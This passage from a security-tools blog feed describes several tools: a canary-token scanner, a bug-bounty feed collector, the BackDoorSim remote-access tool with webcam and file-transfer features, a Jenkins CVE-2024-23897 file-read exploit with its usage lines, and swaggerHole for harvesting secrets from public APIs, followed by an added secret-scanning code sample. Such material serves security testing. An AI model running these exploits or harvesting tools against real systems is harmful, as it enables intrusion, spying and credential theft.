opened. This Python script detects such potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files before they are opened, reducing the risk of inadvertently triggering a canary token or malicious code.</p><span><a name='more'></a></span><p><br /></p><b>Understanding the Script</b><br /> <br /><b>Identification</b><br /> <p>The script identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. Office documents and Zip files are zip archives, so their contents can be unpacked and examined programmatically.</p> <br /><b>Decompression and Scanning</b><br /> <p>For both Office and Zip files, the script decompresses the contents into a temporary directory. 
It then scans these contents for URLs using regular expressions, since an embedded URL is how canary tokens and similar beacons report that a file has been opened.</p> <br /><b>Ignoring Certain URLs</b><br /> <p>To minimize false positives, the script includes a list of domains to ignore, filtering out the common URLs typically found in Office documents (for example the schema and namespace URLs that every Office file contains). This keeps the <a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="analysis">analysis</a> focused on unusual or potentially harmful URLs.</p> <br /><b>Flagging Suspicious Files</b><br /> <p>Files containing URLs not on the ignore list are marked as suspicious. This heuristic can be adapted to your specific security context and threat landscape.</p> <br /><b>Cleanup and Restoration</b><br /> <p>After scanning, the script erases the temporary decompressed files, leaving no traces.</p> <br /><b>Usage</b><br /> <p>To use the script:</p> <p><strong>Setup</strong></p> <ol> <li>Ensure Python is installed on your system.</li> <li>Place the script in an accessible location.</li> <li>Run it with <code>python CanaryTokenScanner.py FILE_OR_DIRECTORY_PATH</code>, replacing <code>FILE_OR_DIRECTORY_PATH</code> with the actual file or <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> path.</li> </ol> <p><strong>Interpretation</strong></p> <ol> <li>Examine the output. Remember, this script is a starting point; flagged documents might not be harmful, and not all malicious documents will be flagged. 
Manual examination and additional security measures are advisable.</li> </ol> <br /><b>Script Showcase</b><br /> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7337930840565836562" src="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG=w640-h122" width="640" /></a> </p><p style="text-align: center;"><em>An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.</em></p> <br /><b>Disclaimer</b><br /> <p>This script is intended for educational and security testing purposes only. 
Utilize it responsibly and in <a href="https://www.kitploit.com/search/label/Compliance" target="_blank" title="compliance">compliance</a> with applicable laws and regulations.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/0xNslabs/CanaryTokenScanner" rel="nofollow" target="_blank" title="Download CanaryTokenScanner">Download CanaryTokenScanner</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-12609197685656093042024-02-27T08:30:00.011-03:002024-02-27T08:30:00.137-03:00Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEipHwXsYxZpBE2qFj_ZQIUc2Xu3-T2hYWe_nlpzMKHtzR3Ay7gVZ6mrF0tQr6kMul_NKwtdyQRGou0DxlLIIFU0UfkfQHDphNH-Q52m5f7j2lh62ijvN6UEYxOZAoM_Y50TfqYPmCkmy-hSf-9D6jpWGuEX_TaUaBmlTaBOWA9gdBBvno5vBUA_RlcBDHde"><img alt="" border="0" height="458" id="BLOGGER_PHOTO_ID_7337938156415012754" src="https://blogger.googleusercontent.com/img/a/AVvXsEipHwXsYxZpBE2qFj_ZQIUc2Xu3-T2hYWe_nlpzMKHtzR3Ay7gVZ6mrF0tQr6kMul_NKwtdyQRGou0DxlLIIFU0UfkfQHDphNH-Q52m5f7j2lh62ijvN6UEYxOZAoM_Y50TfqYPmCkmy-hSf-9D6jpWGuEX_TaUaBmlTaBOWA9gdBBvno5vBUA_RlcBDHde=w640-h458" width="640" /></a></p><br /> <p>Collector for new bug bounty (vulnerability) postings on huntr.com</p> <span><a name='more'></a></span><p><br /></p><span style="font-size: x-large;"><b>Requirements</b></span><br /> <ul> <li>Chrome with GUI (If you run into trouble running the script, check the status of the VM's GPU features, if available.)</li> <li>Chrome WebDriver</li></ul> <br /><span style="font-size: x-large;"><b>Preview</b></span><br /> <pre><code># python3 main.py<br /><br />*2024-02-20 16:14:47.836189*<br /><br />1. 
Arbitrary File Reading due to Lack of Input Filepath Validation<br />- Feb 6th 2024 / High (CVE-2024-0964)<br />- gradio-app/gradio<br />- https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/<br /><br />2. View Barcode Image leads to <a href="https://www.kitploit.com/search/label/Remote" target="_blank" title="Remote">Remote</a> Code Execution<br />- Jan 31st 2024 / Critical (CVE: Not yet)<br />- dolibarr/dolibarr<br />- https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/<br /><br /></code></pre> <p>(delimiter-based file database)</p> <pre><code># <a href="https://www.kitploit.com/search/label/Vim" target="_blank" title="vim">vim</a> feeds.db<br /><br />1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/<br />2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/<br />3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/<br />4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/<br />5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/<br /></code></pre> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li>This code is designed to parse HTML elements from huntr.com, so it may not function correctly if the HTML page structure changes. 
</li> <li>Exception handling is included for parsing errors, so if the script doesn't work as expected, inspect the HTML source for changes.</li> <li>If you run into trouble in a typical <a href="https://www.kitploit.com/search/label/Cloud" target="_blank" title="cloud">cloud</a> environment, note that the <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> may not function properly within virtual machines (VMs).</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/password123456/huntr-com-bug-bounties-collector" rel="nofollow" target="_blank" title="Download Huntr-Com-Bug-Bounties-Collector">Download Huntr-Com-Bug-Bounties-Collector</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71268029381772075822024-02-26T08:30:00.006-03:002024-02-26T08:30:00.141-03:00BackDoorSim - An Educational Into Remote Administration Tools<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDyueyU26LM9aLQPbpoMyxMgwxtXzCl6HK6JmoKVrU27Y61F10oDEPbDOr4p5TW16bQZhXaZrEuXdUpLNkkCl1WceelIRXKLMOdmirxENlD_Z-P6zTwjZjBaex9O1A073GF3XNRajsht4LRva1xUw1NTphQ3xXDmkdKWEPVs-AozdAIjFUWKKtMApoAL4/s1905/BackDoorSim.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="955" data-original-width="1905" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDyueyU26LM9aLQPbpoMyxMgwxtXzCl6HK6JmoKVrU27Y61F10oDEPbDOr4p5TW16bQZhXaZrEuXdUpLNkkCl1WceelIRXKLMOdmirxENlD_Z-P6zTwjZjBaex9O1A073GF3XNRajsht4LRva1xUw1NTphQ3xXDmkdKWEPVs-AozdAIjFUWKKtMApoAL4/w640-h320/BackDoorSim.png" width="640" /></a></div><br /><p></p><p><code>BackdoorSim</code> is a remote administration and monitoring tool designed for educational and testing purposes. 
It consists of two main components: <code>ControlServer</code> and <code>BackdoorClient</code>. The server controls the client, allowing for various <a href="https://www.kitploit.com/search/label/Operations" target="_blank" title="operations">operations</a> such as file transfer, system monitoring, and more.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b><strong>Disclaimer</strong></b></span><br /> <p>This tool is intended for educational purposes only. Misuse of this software can violate <a href="https://www.kitploit.com/search/label/Privacy" target="_blank" title="privacy">privacy</a> and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.</p> <br /><span style="font-size: large;"><b><strong>Features</strong></b></span><br /> <ul> <li><strong>File Transfer</strong>: Upload and download files between server and client.</li> <li><strong>Screenshot Capture</strong>: Take screenshots from the client's system.</li> <li><strong>System Information Gathering</strong>: Retrieve detailed system and security software information.</li> <li><strong>Camera Access</strong>: <a href="https://www.kitploit.com/search/label/Capture" target="_blank" title="Capture">Capture</a> images from the client's webcam.</li> <li><strong>Notifications</strong>: Send and display notifications on the client system.</li> <li><strong>Help Menu</strong>: Easy access to command information and usage.</li> </ul> <br /><span style="font-size: large;"><b><strong>Installation</strong></b></span><br /> <p>To set up <code>BackdoorSim</code>, you will need to install it on both the server and client machines.</p> <ol> <li>Clone the repository: <pre><code>$ git clone https://github.com/HalilDeniz/BackDoorSim.git<br /></code></pre></li> <li>Navigate to the project directory: <pre><code>$ cd BackDoorSim<br /></code></pre></li> 
<li>Install the required dependencies: <pre><code>$ pip install -r requirements.txt<br /></code></pre></li> </ol> <br /><span style="font-size: large;"><b><strong>Usage</strong></b></span><br /> <p>After starting both the server and client, you can use the following commands in the server's command prompt:</p> <ul> <li><code>upload [file_path]</code>: Upload a file to the client.</li> <li><code>download [file_path]</code>: Download a file from the client.</li> <li><code>screenshot</code>: Capture a <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="screenshot">screenshot</a> from the client.</li> <li><code>sysinfo</code>: Get system information from the client.</li> <li><code>securityinfo</code>: Get security software status from the client.</li> <li><code>camshot</code>: Capture an image from the client's webcam.</li> <li><code>notify [title] [message]</code>: Send a notification to the client.</li> <li><code>help</code>: Display the help menu.</li> </ul> <br /><span style="font-size: large;"><b><strong>Disclaimer</strong></b></span><br /> <p>BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. 
Always ensure ethical and legal use of this tool.</p> <br /><span style="font-size: large;"><b><strong>DepNot: RansomwareSim</strong></b></span><br /> <p>If you are interested in tools like BackdoorSim, be sure to check out my recently released <strong><a href="https://denizhalil.com/2023/12/30/ransomware-prevention-education/" rel="nofollow" target="_blank" title="RansomwareSim">RansomwareSim</a></strong> tool.</p> <br /><span style="font-size: large;"><b><strong>BackdoorSim: An Educational into <a href="https://www.kitploit.com/search/label/Remote%20Administration" target="_blank" title="Remote Administration">Remote Administration</a> Tools</strong></b></span><br /> <p>If you want to read our article about BackdoorSim, see <a href="https://denizhalil.com/2024/01/29/educational-remote-administration-tool-backdoorsim/" rel="nofollow" target="_blank" title="Backdoor">denizhalil.com</a>.</p> <br /><span style="font-size: large;"><b><strong>Contributing</strong></b></span><br /> <p>Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.</p> <ol> <li>Fork the repository.</li> <li>Create a new branch for your feature or bug fix.</li> <li>Make your changes and commit them.</li> <li>Push your changes to your forked repository.</li> <li>Open a pull request in the main repository.</li> </ol> <br /><span style="font-size: large;"><b><strong>Contact</strong></b></span><br /> <p>For any inquiries or further information, you can reach me through the following channels:</p> <ul> <li>LinkedIn: <a href="https://www.linkedin.com/in/halil-ibrahim-deniz/" rel="nofollow" target="_blank" title="Halil Ibrahim Deniz">Halil Ibrahim Deniz</a></li> <li>TryHackMe: <a href="https://tryhackme.com/p/halilovic" rel="nofollow" target="_blank" title="Halilovic">Halilovic</a></li> <li>Instagram: <a href="https://www.instagram.com/deniz.halil333/" rel="nofollow" target="_blank" title="deniz.halil333">deniz.halil333</a></li> <li>YouTube: <a href="https://www.youtube.com/c/HalilDeniz" rel="nofollow" target="_blank" title="Halil Deniz">Halil Deniz</a></li> <li>Email: halildeniz313@gmail.com</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/HalilDeniz/BackDoorSim" rel="nofollow" target="_blank" title="Download BackDoorSim">Download BackDoorSim</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5651848469322305022024-02-25T08:30:00.004-03:002024-02-25T08:30:00.155-03:00CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi2ujWgI-O8XhSDEW0GKqe34k767hx6qkhb75LEchmxfueorSZJchGkvtr6i3N6sWi2UBcSUwXC5YJg6FMScmxBFv58uPGkI9kYXZqbm-1fjnmjP-9MQmRRsOuCooses0JgzkXaH2BhtC9OOSgnDiXnrhtOrC5UOyN2SGEJd5QyIkhGrc-rjS3Qi9WJPMI9"><img alt="" border="0" height="278" id="BLOGGER_PHOTO_ID_7337929743698788354" src="https://blogger.googleusercontent.com/img/a/AVvXsEi2ujWgI-O8XhSDEW0GKqe34k767hx6qkhb75LEchmxfueorSZJchGkvtr6i3N6sWi2UBcSUwXC5YJg6FMScmxBFv58uPGkI9kYXZqbm-1fjnmjP-9MQmRRsOuCooses0JgzkXaH2BhtC9OOSgnDiXnrhtOrC5UOyN2SGEJd5QyIkhGrc-rjS3Qi9WJPMI9=w640-h278" width="640" /></a></p><br /> <p>Exploitation and <a 
href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> tool specifically designed for Jenkins versions <code>&lt;= 2.441 &amp; &lt;= LTS 2.426.2</code>. It leverages <code>CVE-2024-23897</code>, an arbitrary file read through the Jenkins CLI (fixed in Jenkins 2.442 and LTS 2.426.3), to assess and exploit <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> in Jenkins instances, which is why the tool takes the path of a file to read on the target. </p> <span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Usage</b></span><br /> <p>Ensure you have the necessary permissions to <a href="https://www.kitploit.com/search/label/Scan" target="_blank" title="scan">scan</a> and exploit the target systems. Use this tool responsibly and ethically.</p> <pre><code>python CVE-2024-23897.py -t &lt;target&gt; -p &lt;port&gt; -f &lt;file&gt;<br /></code></pre> <p>or</p> <pre><code>python CVE-2024-23897.py -i &lt;input_file&gt; -f &lt;file&gt;<br /></code></pre> <p><strong>Parameters:</strong></p> <ul> <li><code>-t</code> or <code>--target</code>: Specify the target IP(s). Supports a single IP, an IP range, a comma-separated list, or a <a href="https://www.kitploit.com/search/label/CIDR" target="_blank" title="CIDR">CIDR</a> block.</li> <li><code>-i</code> or <code>--input-file</code>: Path to an input file containing hosts in the format <code>http://1.2.3.4:8080/</code> (one per line).</li> <li><code>-o</code> or <code>--output-file</code>: Export results to a file (optional).</li> <li><code>-p</code> or <code>--port</code>: Specify the port number. Default is 8080 (optional).</li> <li><code>-f</code> or <code>--file</code>: Specify the file to read on the target system.</li> </ul> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>[27th January 2024] - Feature Request</b><br /> <ul> <li>Added scanning/exploiting via input file with hosts (<code>-i INPUT_FILE</code>). 
</li> <li>Added export to file (<code>-o OUTPUT_FILE</code>).</li> </ul> <br /><b>[26th January 2024] - Initial Release</b><br /> <ul> <li>Initial release.</li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.</p> <br /><span style="font-size: large;"><b>Author</b></span><br /> <p><strong>Alexander Hagenah</strong> - <a href="https://primepage.de" rel="nofollow" target="_blank" title="URL">URL</a> - <a href="https://twitter.com/xaitax" rel="nofollow" target="_blank" title="Twitter">Twitter</a></p> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>This tool is meant for educational and professional purposes only. Unauthorized scanning and <a href="https://www.kitploit.com/search/label/Exploiting" target="_blank" title="exploiting">exploiting</a> of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/xaitax/CVE-2024-23897" rel="nofollow" target="_blank" title="Download CVE-2024-23897">Download CVE-2024-23897</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-70233308256489761692024-02-24T08:30:00.001-03:002024-02-24T08:30:00.128-03:00swaggerHole - A Python3 Script Searching For Secret On Swaggerhub<p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRljQyFcgTZb4QTUQAXiP9eyW_Fekzx2kyra3RU1VavN4YnL6zw4rNwfeZnizpu6kduRsMj2JcgySp-UuMDoxok-6vBpNlpU4gea4gmMI7cdXGxPQ8EvKjXjpqX9Awz3WGQsAU5OctKJ7iJwfi0AczjKJ-h92AKkwZJrxcxU-1Wr3ui1-ITAGicwPyjc53"><img alt="" border="0" height="470" id="BLOGGER_PHOTO_ID_7338562964720588994" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEgRljQyFcgTZb4QTUQAXiP9eyW_Fekzx2kyra3RU1VavN4YnL6zw4rNwfeZnizpu6kduRsMj2JcgySp-UuMDoxok-6vBpNlpU4gea4gmMI7cdXGxPQ8EvKjXjpqX9Awz3WGQsAU5OctKJ7iJwfi0AczjKJ-h92AKkwZJrxcxU-1Wr3ui1-ITAGicwPyjc53=w640-h470" width="640" /></a> </p><p align="center"><br /></p><h2 style="text-align: left;">Introduction</h2><div><p>This tool automates retrieving <a href="https://www.kitploit.com/search/label/Secrets" target="_blank" title="secrets">secrets</a> from the public APIs on <a href="https://app.swaggerhub.com/search" rel="nofollow" target="_blank" title="swaggerHub">swaggerHub</a>. It is <a href="https://www.kitploit.com/search/label/multithreaded" target="_blank" title="multithreaded">multithreaded</a>, and a pipe mode is available :)</p><span><a name='more'></a></span><div><br /></div><h2 style="text-align: left;">Requirements</h2><ul><li>python3 (<code>sudo apt install python3</code>)</li><li>pip3 (<code>sudo apt install python3-pip</code>)</li></ul><h2 style="text-align: left;">Installation</h2><pre><code>pip3 install swaggerhole<br /></code></pre><p>or <a href="https://www.kitploit.com/search/label/Cloning" target="_blank" title="cloning">cloning</a> this repository and running</p><pre><code>git clone https://github.com/Liodeus/swaggerHole.git<br />pip3 install .<br /></code></pre><div><br /></div><h2 style="text-align: left;">Usage</h2><pre><code>usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]<br /><br />optional arguments:<br />  -h, --help            show this help message and exit<br />  -s SEARCH, --search SEARCH<br />                        Term to search<br />  -o OUT, --out OUT     Output directory<br />  -t THREADS, --threads THREADS<br />                        Threads number (Default 25)<br />  -j, --json            Json ouput<br />  -q, --quiet           Remove banner<br />  -du, --deactivate_url<br />                        Deactivate the URL filtering<br />  -de, --deactivate_email<br />                        Deactivate the email filtering<br /></code></pre><div><br /></div><h3 style="text-align: left;">Search for secrets about a domain</h3><pre><code>swaggerHole -s test.com<br /><br />echo test.com | swaggerHole<br /></code></pre><h3 style="text-align: left;">Search for secrets about a domain and output to JSON</h3><pre><code>swaggerHole -s test.com --json<br /><br />echo test.com | swaggerHole --json<br /></code></pre><h3 style="text-align: left;">Search for secrets about a domain and do it fast :)</h3><pre><code>swaggerHole -s test.com -t 100<br /><br />echo test.com | swaggerHole -t 100<br /></code></pre><div><br /></div><h2 style="text-align: left;">Output explanation</h2><h3 style="text-align: left;">Normal output</h3><div><code>Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]</code></div><h3 style="text-align: left;">Json output</h3><div><code>{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}</code></div><h3 style="text-align: left;">Deactivate url/email</h3><div>Using <code>-du</code> or <code>-de</code> removes the URL or email filtering done by the tool; expect more false positives with those options.</div><div><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Liodeus/swaggerHole" rel="nofollow" target="_blank" title="Download swaggerHole">Download swaggerHole</a></span></b></div></div></div>Unknownnoreply@blogger.com
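<p>The swaggerHole output formats and the <code>-du</code>/<code>-de</code> behaviour described above, as an added example that is not swaggerHole's own code: it scans a constructed Swagger 2.0 document line by line with a small secret-pattern set, drops matches that are whole URLs or e-mail addresses unless that filtering is switched off (more false positives come back, exactly as the page warns), and formats each hit as <code>Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]</code>. The pattern list, the sample spec with its dummy AWS key and bearer token, the <code>scan_spec</code>/<code>report</code> functions and the filtering rules are assumptions made for this demonstration; the JSON form adds an explicit <code>Finding</code> key next to <code>Finding_Type</code>.</p>

```python
"""swaggerHole-style secret scan over a Swagger/OpenAPI document.

Added example, not the swaggerHole source. The pattern set, the sample spec,
the dummy key values and the exact filtering rules are assumptions made for
this demonstration.
"""
import json
import re
from dataclasses import dataclass

# Ordered from specific to generic so the most specific label wins when
# several patterns hit the same value. Group 1 is the reported secret.
PATTERNS = [
    ("AWS Access Key", re.compile(r"\b(AKIA[0-9A-Z]{16})\b")),
    ("Bearer Token", re.compile(r"(?i)\bbearer\s+([A-Za-z0-9\-._~+/]{20,}=*)")),
    # A key-like name (secret, token, password, api_key ...) followed by : or =
    # and a value of at least 8 non-blank characters. Deliberately noisy.
    ("Generic Secret", re.compile(
        r"(?i)\b(?:secret|token|password|api[_-]?key)[\w-]*[\"']?\s*[:=]\s*[\"']?([^\s\"',}]{8,})")),
]
# A value that is a whole URL or e-mail address (OAuth tokenUrl, contact
# address) is treated as a false positive unless the matching filter is off.
URL_RE = re.compile(r"^https?://\S+$")
EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+(?:\.[\w-]+)+$")


@dataclass(frozen=True)
class Finding:
    finding_type: str
    finding: str
    file: str   # Swagger_Name / File_path in the page's output templates
    date: str   # Date_Last_Update
    line: int

    def normal(self) -> str:
        """Normal output line, same shape as the page's template."""
        return f"{self.finding_type} - {self.finding} - [{self.file}][{self.date}][Line:{self.line}]"

    def as_json(self) -> str:
        """JSON output; adds an explicit "Finding" key next to Finding_Type."""
        return json.dumps({"Finding_Type": self.finding_type, "Finding": self.finding,
                           "File": self.file, "Date": self.date, "Line": self.line})


def scan_spec(text: str, swagger_name: str, last_update: str,
              filter_url: bool = True, filter_email: bool = True) -> list[Finding]:
    """Scan the spec text line by line and return the surviving findings.

    filter_url=False / filter_email=False correspond to -du / -de: URL and
    e-mail matches are reported again, false positives included.
    """
    findings: list[Finding] = []
    seen: set[tuple[int, str]] = set()
    for lineno, line in enumerate(text.splitlines(), start=1):
        for finding_type, pattern in PATTERNS:
            for match in pattern.finditer(line):
                value = match.group(1)
                if (lineno, value) in seen:
                    continue  # already reported under a more specific label
                if filter_url and URL_RE.match(value):
                    continue
                if filter_email and EMAIL_RE.match(value):
                    continue
                seen.add((lineno, value))
                findings.append(Finding(finding_type, value, swagger_name, last_update, lineno))
    return findings


# Constructed sample: a small Swagger 2.0 file holding a dummy AWS key and a
# dummy bearer token, plus an OAuth2 tokenUrl and a contact address that the
# generic key/value regex also hits.
SAMPLE_SPEC = """{
  "swagger": "2.0",
  "info": {"title": "Payments API", "version": "1.0"},
  "securityDefinitions": {
    "oauth": {"type": "oauth2", "flow": "application",
              "tokenUrl": "https://auth.example.com/oauth/token"}
  },
  "x-secret-contact": "secops@example.com",
  "paths": {"/charge": {"post": {
    "description": "Send header x-api-key: AKIAIOSFODNN7EXAMPLE",
    "parameters": [{"name": "Authorization", "in": "header",
                    "default": "Bearer eyJhbGciOiJIUzI1NiJ9.e30.c2lnbmF0dXJl12345678"}]
  }}}
}"""


def report(text: str, swagger_name: str, last_update: str, as_json: bool = False,
           deactivate_url: bool = False, deactivate_email: bool = False) -> list[str]:
    """One output line per finding, mirroring the -j / -du / -de switches."""
    found = scan_spec(text, swagger_name, last_update,
                      filter_url=not deactivate_url, filter_email=not deactivate_email)
    return [f.as_json() if as_json else f.normal() for f in found]


if __name__ == "__main__":
    print("default filtering:")
    print("\n".join(report(SAMPLE_SPEC, "payments.json", "2024-02-24")))
    print("\nwith -du -de (filters off):")
    print("\n".join(report(SAMPLE_SPEC, "payments.json", "2024-02-24",
                           deactivate_url=True, deactivate_email=True)))
```

<p>With the default filters the sample yields only the AWS key (line 10) and the bearer token (line 12); turning both filters off adds the <code>tokenUrl</code> value and the contact address as "Generic Secret" findings, which is the trade-off the page describes for <code>-du</code> and <code>-de</code>.</p>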